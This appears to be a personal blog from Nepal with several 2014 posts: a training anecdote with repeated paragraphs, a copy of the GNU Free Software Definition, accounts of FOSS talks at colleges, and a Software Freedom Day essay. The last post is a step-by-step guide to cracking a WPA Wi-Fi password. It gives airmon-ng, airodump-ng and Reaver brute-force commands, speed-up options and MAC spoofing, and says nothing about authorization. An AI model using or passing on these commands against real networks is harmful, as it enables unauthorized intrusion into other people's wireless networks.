आभास
नयाँपनको..
Monday, November 21, 2016
Thursday, September 25, 2014
Three Days Training of UNI NLC
This story is about training. Leadership training.....
I got a call from Prakash dai.. He told me many things but understood nothing
and I proposed for a meeting. He accepted but couldnot meet at that day. The
day was 18th September. And 20th September was the day this year when
software freedom day was going to be celebrated. I was the part of
organising team. There I saw Prakash dai and talked what was he telling me in
the phone. He told anout some UNI...UNO... umions and there too I couldnot
understand more. He told me training will be from 22nd September and I too
was ready to join the training. The day passed and the there was a day, 22nd
September.
I was called at Babar Mahal for the vehicle. I went there at sharp 8. There
were few people. After a while, I come to know that they too were the
participants and from Nepal Telecom. I did not talk a lot and vehicle was
there for pick up. In the way, I met Maina Thapa of Rastriya Samachar Samiti.
We had some talks there and move towards bus.
I got a call from Prakash dai.. He told me many things but understood nothing
and I proposed for a meeting. He accepted but couldnot meet at that day. The
day was 18th September. And 20th September was the day this year when
software freedom day was going to be celebrated. I was the part of
organising team. There I saw Prakash dai and talked what was he telling me in
the phone. He told anout some UNI...UNO... umions and there too I couldnot
understand more. He told me training will be from 22nd September and I too
was ready to join the training. The day passed and the there was a day, 22nd
September.
I was called at Babar Mahal for the vehicle. I went there at sharp 8. There
were few people. After a while, I come to know that they too were the
participants and from Nepal Telecom. I did not talk a lot and vehicle was
there for pick up. In the way, I met Maina Thapa of Rastriya Samachar Samiti.
We had some talks there and move towards bus.
Friday, September 5, 2014
What is free software?
The Free Software Definition
The free software definition presents the criteria for whether a particular software program qualifies as free software. From time to time we revise this definition, to clarify it or to resolve questions about subtle issues. See the History section below for a list of changes that affect the definition of free software.“Free software” means software that respects users' freedom and community. Roughly, it means that the users have the freedom to run, copy, distribute, study, change and improve the software. Thus, “free software” is a matter of liberty, not price. To understand the concept, you should think of “free” as in “free speech,” not as in “free beer”.
We campaign for these freedoms because everyone deserves them. With these freedoms, the users (both individually and collectively) control the program and what it does for them. When users don't control the program, we call it a “nonfree” or “proprietary” program. The nonfree program controls the users, and the developer controls the program; this makes the program an instrument of unjust power.
A program is free software if the program's users have the four essential freedoms:
- The freedom to run the program as you wish, for any purpose (freedom 0).
- The freedom to study how the program works, and change it so it does your computing as you wish (freedom 1). Access to the source code is a precondition for this.
- The freedom to redistribute copies so you can help your neighbor (freedom 2).
- The freedom to distribute copies of your modified versions to others (freedom 3). By doing this you can give the whole community a chance to benefit from your changes. Access to the source code is a precondition for this.
The rest of this page clarifies certain points about what makes specific freedoms adequate or not.
Freedom to distribute (freedoms 2 and 3) means you are free to redistribute copies, either with or without modifications, either gratis or charging a fee for distribution, to anyone anywhere. Being free to do these things means (among other things) that you do not have to ask or pay for permission to do so.
You should also have the freedom to make modifications and use them privately in your own work or play, without even mentioning that they exist. If you do publish your changes, you should not be required to notify anyone in particular, or in any particular way.
The freedom to run the program means the freedom for any kind of person or organization to use it on any kind of computer system, for any kind of overall job and purpose, without being required to communicate about it with the developer or any other specific entity. In this freedom, it is the user's purpose that matters, not the developer's purpose; you as a user are free to run the program for your purposes, and if you distribute it to someone else, she is then free to run it for her purposes, but you are not entitled to impose your purposes on her.
The freedom to run the program as you wish means that you are not forbidden or stopped from doing so. It has nothing to do with what functionality the program has, or whether it is useful for what you want to do.
The freedom to redistribute copies must include binary or executable forms of the program, as well as source code, for both modified and unmodified versions. (Distributing programs in runnable form is necessary for conveniently installable free operating systems.) It is OK if there is no way to produce a binary or executable form for a certain program (since some languages don't support that feature), but you must have the freedom to redistribute such forms should you find or develop a way to make them.
In order for freedoms 1 and 3 (the freedom to make changes and the freedom to publish the changed versions) to be meaningful, you must have access to the source code of the program. Therefore, accessibility of source code is a necessary condition for free software. Obfuscated “source code” is not real source code and does not count as source code.
Freedom 1 includes the freedom to use your changed version in place of the original. If the program is delivered in a product designed to run someone else's modified versions but refuse to run yours — a practice known as “tivoization” or “lockdown”, or (in its practitioners' perverse terminology) as “secure boot” — freedom 1 becomes an empty pretense rather than a practical reality. These binaries are not free software even if the source code they are compiled from is free.
One important way to modify a program is by merging in available free subroutines and modules. If the program's license says that you cannot merge in a suitably licensed existing module — for instance, if it requires you to be the copyright holder of any code you add — then the license is too restrictive to qualify as free.
Freedom 3 includes the freedom to release your modified versions as free software. A free license may also permit other ways of releasing them; in other words, it does not have to be a copyleft license. However, a license that requires modified versions to be nonfree does not qualify as a free license.
In order for these freedoms to be real, they must be permanent and irrevocable as long as you do nothing wrong; if the developer of the software has the power to revoke the license, or retroactively add restrictions to its terms, without your doing anything wrong to give cause, the software is not free.
However, certain kinds of rules about the manner of distributing free software are acceptable, when they don't conflict with the central freedoms. For example, copyleft (very simply stated) is the rule that when redistributing the program, you cannot add restrictions to deny other people the central freedoms. This rule does not conflict with the central freedoms; rather it protects them.
In the GNU project, we use copyleft to protect the four freedoms legally for everyone. We believe there are important reasons why it is better to use copyleft. However, noncopylefted free software is ethical too. See Categories of Free Software for a description of how “free software,” “copylefted software” and other categories of software relate to each other.
“Free software” does not mean “noncommercial”. A free program must be available for commercial use, commercial development, and commercial distribution. Commercial development of free software is no longer unusual; such free commercial software is very important. You may have paid money to get copies of free software, or you may have obtained copies at no charge. But regardless of how you got your copies, you always have the freedom to copy and change the software, even to sell copies.
Whether a change constitutes an improvement is a subjective matter. If your right to modify a program is limited, in substance, to changes that someone else considers an improvement, that program is not free.
However, rules about how to package a modified version are acceptable, if they don't substantively limit your freedom to release modified versions, or your freedom to make and use modified versions privately. Thus, it is acceptable for the license to require that you change the name of the modified version, remove a logo, or identify your modifications as yours. As long as these requirements are not so burdensome that they effectively hamper you from releasing your changes, they are acceptable; you're already making other changes to the program, so you won't have trouble making a few more.
Rules that “if you make your version available in this way, you must make it available in that way also” can be acceptable too, on the same condition. An example of such an acceptable rule is one saying that if you have distributed a modified version and a previous developer asks for a copy of it, you must send one. (Note that such a rule still leaves you the choice of whether to distribute your version at all.) Rules that require release of source code to the users for versions that you put into public use are also acceptable.
A special issue arises when a license requires changing the name by which the program will be invoked from other programs. That effectively hampers you from releasing your changed version so that it can replace the original when invoked by those other programs. This sort of requirement is acceptable only if there's a suitable aliasing facility that allows you to specify the original program's name as an alias for the modified version.
Sometimes government export control regulations and trade sanctions can constrain your freedom to distribute copies of programs internationally. Software developers do not have the power to eliminate or override these restrictions, but what they can and must do is refuse to impose them as conditions of use of the program. In this way, the restrictions will not affect activities and people outside the jurisdictions of these governments. Thus, free software licenses must not require obedience to any nontrivial export regulations as a condition of exercising any of the essential freedoms.
Merely mentioning the existence of export regulations, without making them a condition of the license itself, is acceptable since it does not restrict users. If an export regulation is actually trivial for free software, then requiring it as a condition is not an actual problem; however, it is a potential problem, since a later change in export law could make the requirement nontrivial and thus render the software nonfree.
A free license may not require compliance with the license of a nonfree program. Thus, for instance, if a license requires you to comply with the licenses of “all the programs you use”, in the case of a user that runs nonfree programs this would require compliance with the licenses of those nonfree programs; that makes the license nonfree.
It is acceptable for a free license to specify which jurisdiction's law applies, or where litigation must be done, or both.
Most free software licenses are based on copyright, and there are limits on what kinds of requirements can be imposed through copyright. If a copyright-based license respects freedom in the ways described above, it is unlikely to have some other sort of problem that we never anticipated (though this does happen occasionally). However, some free software licenses are based on contracts, and contracts can impose a much larger range of possible restrictions. That means there are many possible ways such a license could be unacceptably restrictive and nonfree.
We can't possibly list all the ways that might happen. If a contract-based license restricts the user in an unusual way that copyright-based licenses cannot, and which isn't mentioned here as legitimate, we will have to think about it, and we will probably conclude it is nonfree.
When talking about free software, it is best to avoid using terms like “give away” or “for free,” because those terms imply that the issue is about price, not freedom. Some common terms such as “piracy” embody opinions we hope you won't endorse. See Confusing Words and Phrases that are Worth Avoiding for a discussion of these terms. We also have a list of proper translations of “free software” into various languages.
Finally, note that criteria such as those stated in this free software definition require careful thought for their interpretation. To decide whether a specific software license qualifies as a free software license, we judge it based on these criteria to determine whether it fits their spirit as well as the precise words. If a license includes unconscionable restrictions, we reject it, even if we did not anticipate the issue in these criteria. Sometimes a license requirement raises an issue that calls for extensive thought, including discussions with a lawyer, before we can decide if the requirement is acceptable. When we reach a conclusion about a new issue, we often update these criteria to make it easier to see why certain licenses do or don't qualify.
If you are interested in whether a specific license qualifies as a free software license, see our list of licenses. If the license you are concerned with is not listed there, you can ask us about it by sending us email at <licensing@gnu.org>.
If you are contemplating writing a new license, please contact the Free Software Foundation first by writing to that address. The proliferation of different free software licenses means increased work for users in understanding the licenses; we may be able to help you find an existing free software license that meets your needs.
If that isn't possible, if you really need a new license, with our help you can ensure that the license really is a free software license and avoid various practical problems.
Beyond Software
Software manuals must be free, for the same reasons that software must be free, and because the manuals are in effect part of the software.The same arguments also make sense for other kinds of works of practical use — that is to say, works that embody useful knowledge, such as educational works and reference works. Wikipedia is the best-known example.
Any kind of work can be free, and the definition of free software has been extended to a definition of free cultural works applicable to any kind of works.
Open Source?
Another group has started using the term “open source” to mean something close (but not identical) to “free software”. We prefer the term “free software” because, once you have heard that it refers to freedom rather than price, it calls to mind freedom. The word “open” never refers to freedom.History
From time to time we revise this Free Software Definition. Here is the list of substantive changes, along with links to show exactly what was changed.- Version 1.135: Say each time that freedom 0 is the freedom to run the program as you wish.
- Version 1.134: Freedom 0 is not a matter of the program's functionality.
- Version 1.131: A free license may not require compliance with a nonfree license of another program.
- Version 1.129: State explicitly that choice of law and choice of forum specifications are allowed. (This was always our policy.)
- Version 1.122: An export control requirement is a real problem if the requirement is nontrivial; otherwise it is only a potential problem.
- Version 1.118: Clarification: the issue is limits on your right to modify, not on what modifications you have made. And modifications are not limited to “improvements”
- Version 1.111: Clarify 1.77 by saying that only retroactive restrictions are unacceptable. The copyright holders can always grant additional permission for use of the work by releasing the work in another way in parallel.
- Version 1.105: Reflect, in the brief statement of freedom 1, the point (already stated in version 1.80) that it includes really using your modified version for your computing.
- Version 1.92: Clarify that obfuscated code does not qualify as source code.
- Version 1.90: Clarify that freedom 3 means the right to distribute copies of your own modified or improved version, not a right to participate in someone else's development project.
- Version 1.89: Freedom 3 includes the right to release modified versions as free software.
- Version 1.80: Freedom 1 must be practical, not just theoretical; i.e., no tivoization.
- Version 1.77: Clarify that all retroactive changes to the license are unacceptable, even if it's not described as a complete replacement.
- Version
1.74: Four clarifications of points not explicit enough, or stated
in some places but not reflected everywhere:
- "Improvements" does not mean the license can substantively limit what kinds of modified versions you can release. Freedom 3 includes distributing modified versions, not just changes.
- The right to merge in existing modules refers to those that are suitably licensed.
- Explicitly state the conclusion of the point about export controls.
- Imposing a license change constitutes revoking the old license.
- Version 1.57: Add "Beyond Software" section.
- Version 1.46: Clarify whose purpose is significant in the freedom to run the program for any purpose.
- Version 1.41: Clarify wording about contract-based licenses.
- Version 1.40: Explain that a free license must allow to you use other available free software to create your modifications.
- Version 1.39: Note that it is acceptable for a license to require you to provide source for versions of the software you put into public use.
- Version 1.31: Note that it is acceptable for a license to require you to identify yourself as the author of modifications. Other minor clarifications throughout the text.
- Version 1.23: Address potential problems related to contract-based licenses.
- Version 1.16: Explain why distribution of binaries is important.
- Version 1.11: Note that a free license may require you to send a copy of versions you distribute to the author.
Source: http://www.gnu.org/philosophy/free-sw.html
FOSS Ka Kura At Ambition College
On the behalf of the FOSS Nepal Community, we were to the Ambition College for talking and interaction program for the FOSS(Free and Open Source Software). We(me along with Suraj Bhusal) were at the venue by 10:15 and started the talk. We got no students who are familiar with the term FOSS. Firstly, we introduced the term FOSS and we talked a lot about the FOSS, Linux and others like Mozilla, Wikipedia, Open Street Map and so on.
To be continued..............
To be continued..............
Experience
It was a nice experience. I was presenting something in front of mass for the first time and I was feeling nervous. A bit frightened and more excited. Yes, I was in front of students to present about "CSIT(Computer Science and IT)" for the first time with my buddies, Rajan Kandel and Suraj Bhusal.
The event was started by Rajan with "FOSS(Free and Open Source Software) ka Kura". After that me along with Suraj were there to talk and discuss about CSIT. Some interactive students made the session interesting. Talking about Computer Science, Information Technology and the differences between CS and IT was really awosome. It was a great experience to be with you Swastik guys. I am thankful to Mr. Lok Raj Pandey for offering the event.
And it will be my mistake if I forget to talk about white rabbit, that beautiful white rabbit.
The event was started by Rajan with "FOSS(Free and Open Source Software) ka Kura". After that me along with Suraj were there to talk and discuss about CSIT. Some interactive students made the session interesting. Talking about Computer Science, Information Technology and the differences between CS and IT was really awosome. It was a great experience to be with you Swastik guys. I am thankful to Mr. Lok Raj Pandey for offering the event.
And it will be my mistake if I forget to talk about white rabbit, that beautiful white rabbit.
Friday, August 29, 2014
Freedom
In a time when our lives are increasingly dependent on technologies, it is important we take the time to consider the impact of technology on our lives, and the importance of ensuring technology isn't used to limit us, but rather to take us further along a path of opportunity, innovation and freedom for all people.
The United Nations Universal Declaration of Human Rights [1] is a set of basic human rights that most people would agree would be a bare minimum. Not often are our basic rights thought of in the context of technology, but as more and more our lives are dependent on technology, it is a rapidly growing concern. Technologies that matter to our freedom are used in our voting systems, our leisure, our work, education, art and our communication. What does this mean to you? It means that the basic human freedoms you take for granted are only as free as the technologies you use.
Transparent and sustainable technologies are vital to ensuring we can protect our freedoms. Think about e-Government systems such as electronic voting. When the systems running our voting is proprietary or closed, it means that we can’t be sure what the software actually does, so how can we trust the results? The issues with the Diebold [2] voting systems in the US is testament [3] to the need for transparent systems that are trustworthy. Think about other software you use everyday that is proprietary and apply the fact that you can’t be sure what it is actually doing! Does your email system send copies of your mail to a third party? Is your web browser, logging and automatically sending your browse history to someone? The most interesting case recently was when Sony purposely added spyware [4] to their music CDs that silently and automatically installed itself onto Microsoft Windows systems to search for piracy breaches. This behaviour has spawned a whole new wave of viruses and is a gross breach of privacy.
So what do I mean by transparent? Well some software gives you access to the source code, such as Free and Open Source Software (FOSS) which ensures that you can know (or get checked) what exactly a piece of software will do. It avoids nasty surprises, spyware, result rigging and all kinds of issues that we can’t be absolutely sure to avoid in closed software. Proprietary software keeps the source code locked away from public scrutiny which means that there is no way to know exactly what the software actually does, and no way to trust it to safeguard your human rights. Transparent technologies are about ensuring you can trust the results and operation of your technology.
Sustainable technologies are also important, and the best example of the issue is proprietary data formats. Why should the generations of today not have access to the love letters, essays and poems of their youth? With many applications using proprietary data formats, we can't access the information in other programs or even future versions of the same program. When data is stored in data formats based on open standards [5], there is the ability for people everywhere to easily use and implement the standard and have your data accessible by more applications well into the future. Sustainable technologies are about ensuring access to knowledge forever.
As more and more of the worlds population starts using technology, getting online, and developing the next major life changing event of the future (such as the Internet was for many of us), ensuring open, transparent and sustainable approaches are considered best practice is important. Important to a future where technology empowers everyone equally, where knowledge is forever, and where our basic human freedoms are strengthened by technology, not hampered.
Software Freedom Day is a global celebration and education of why transparent and sustainable technologies are now more important than ever. With over 200 teams in 60 countries participating, it is a fantastic event to get your schools and communities involved in. Go along to your local event or start your own event and meet a wide range of people, all working together to help ensure our freedoms are maintained by the technologies of tomorrow.
Monday, May 5, 2014
Crack a Wi-Fi WPA Password
Step 1: Install Airmon-ng Suite
Step 2: Install Reaver
Step 3: To get root privileges, in terminal type:
# sudo -s
Step 4: Find your wireless card.Inside terminal type:
# iwconfig
Step 5: Put your wireless card into monitor mode.Assuming your wireless card's interface name is wlan0, execute the following command to put your wireless card into monitor mode:
# airmon-ng start wlan0
Step 6: In terminal type:
# airodump-ng mon0
It will display a list of wireless networks in range. When you see the network you want to crack, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (MAC address of the targeted network). The network should have WPA or WPA2 listed under the ENC column.
Step 7: Now we start cracking password with Reaver.
# reaver -i moninterface -b bssid -vv
For example, if your monitor interface was mon0 like mine, and your BSSID was
7F:AC:6B:MB:1F:B2
(a BSSID I just made up), your command would look like:# reaver -i mon0 -b 7F:AC:6B:MB:1F:B2 -vv
Now sit back and relax as Reaver will now try a series of PINs on the router in a brute force attack. The Reaver documentation says it can take between 4 and 10 hours.
Speeding Up the Attack
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:
# ifconfig wlan0 down # ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69 # ifconfig wlan0 up # airmon-ng start wlan0 # reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
Subscribe to:
Posts (Atom)